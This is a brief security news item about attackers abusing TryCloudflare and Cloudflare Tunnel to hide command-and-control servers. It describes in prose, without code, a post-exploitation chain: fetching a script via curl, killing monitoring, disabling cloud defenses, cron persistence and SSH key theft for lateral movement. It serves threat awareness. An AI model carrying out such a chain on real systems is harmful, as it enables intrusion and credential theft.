Attackers exploit TryCloudflare to gain an advantage
August 17, 2023 – Published on CSO
Once they gain remote code execution, the attackers run a curl command to download and execute a malicious script for a command-and-control (C2) server with a trycloudflare.com hostname. TryCloudflare is a free-tier service provided by Cloudflare for users to evaluate various platform features. Attackers have been known to abuse it to obfuscate their actual C2 server location since Cloudflare’s CDN acts as a proxy in between.
Once executed on a system the script checks if the watchdog process is running and tries to kill it, deletes files from previous infections, disables Tencent Cloud and Alibaba defensive measure, downloads additional malicious binaries, sets up new system services, modifies cron jobs to achieve persistence, collects locally stored SSH keys which are then used to perform lateral movement to other systems.
To obfuscate their communication with the C2 servers, the attackers deployed the CloudFlare Tunnel, a powerful traffic tunneling solution that allows users to expose local services through the secure Cloudflare network without changing firewall settings or doing port forwarding. Researchers from GuidePoint Security recently reported an increase in the number of attacks that abused the Cloudflare Tunnel and TryCloudflare.
Read More HERE.